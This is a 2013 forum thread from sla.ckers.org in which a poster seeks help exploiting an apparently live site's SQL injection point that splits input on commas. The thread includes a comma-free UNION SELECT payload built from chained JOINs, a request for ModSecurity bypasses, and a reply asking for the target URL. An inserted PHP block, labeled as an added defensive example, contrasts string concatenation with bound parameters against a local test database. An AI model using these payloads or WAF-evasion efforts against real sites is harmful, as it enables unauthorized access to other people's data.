Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Tricky SQL injection.
Posted by: Error_403
Date: August 17, 2013 01:49PM

Hi guys,


I have an injection I imagine looks like this:

$array = explode(",", $_GET['vuln']);

for ( ............ ) {

//SQL

}

Post request looks like this:

id=value1,value2,value3,value4

As you can see, commas are removed from the input, so I have tried using JOIN like this:

id=VALUE1+'+and+1>2+UNION SELECT * FROM+(select 1)a join (select 2)b join (select 3)c join (select 4)d join (select 5)e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k--+',VALUE2,VALUE3,VALUE4

There is no output, so I wanted to try an error-based injection, but functions such as extractvalue(), name_const(), rand() each require more than 1 parameter and therefore require a comma.


Blind works but the host's connection is very slow.


Anybody have any ideas?

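For defenders, an added example that is not part of the thread or any poster's code: the split-on-commas loop sketched above with string concatenation, beside a form that allow-lists each piece and binds it as a parameter. The `items` table, the function names, the sample inputs and the use of in-memory SQLite through PDO are assumptions made so the script runs offline.

```php
<?php
// Added example: constructed schema and data, in-memory SQLite via PDO (assumption).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE items (id TEXT PRIMARY KEY, name TEXT)");
$db->exec("INSERT INTO items VALUES ('1','alpha'),('2','beta'),('3','gamma')");

// Pattern from the post: split on commas, then concatenate each piece into SQL.
// Splitting is not sanitization: a piece without commas still reaches the parser.
function lookup_concat(PDO $db, string $raw): array {
    $names = [];
    foreach (explode(",", $raw) as $piece) {
        $sql = "SELECT name FROM items WHERE id = '" . $piece . "'";
        foreach ($db->query($sql) as $row) {
            $names[] = $row['name'];
        }
    }
    return $names;
}

// Hardened form: allow-list each piece, then bind it so it is only ever data.
function lookup_bound(PDO $db, string $raw): array {
    $stmt = $db->prepare("SELECT name FROM items WHERE id = ?");
    $names = [];
    foreach (explode(",", $raw) as $piece) {
        $piece = trim($piece);
        if (!preg_match('/^[0-9]{1,10}$/', $piece)) {
            throw new InvalidArgumentException("rejected id: " . var_export($piece, true));
        }
        $stmt->execute([$piece]);
        foreach ($stmt->fetchAll(PDO::FETCH_COLUMN) as $name) {
            $names[] = $name;
        }
    }
    return $names;
}

$benign  = "1,3";               // constructed sample input
$hostile = "1,2' OR '1'='1";    // constructed: second piece contains no comma

print_r(lookup_concat($db, $benign));
print_r(lookup_concat($db, $hostile));  // second piece changes the WHERE clause
print_r(lookup_bound($db, $benign));
try {
    lookup_bound($db, $hostile);
} catch (InvalidArgumentException $e) {
    echo "blocked: ", $e->getMessage(), "\n";
}
```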
Re: Tricky SQL injection.
Posted by: Error_403
Date: August 17, 2013 01:53PM

Also, I have another injection point but GET requests are protected by mod security.

If anybody has some bypass for mod security rules from 2012-2013 let me know :D

Re: Tricky SQL injection.
Posted by: winwalk
Date: October 01, 2013 02:45AM

Blind works but the host's connection is very slow.

Re: Tricky SQL injection.
Posted by: jammy99
Date: October 01, 2013 12:47PM

Please PM me the URL.

Re: Tricky SQL injection.
Posted by: pridzx
Date: October 18, 2013 12:42AM

Thank you for goods.
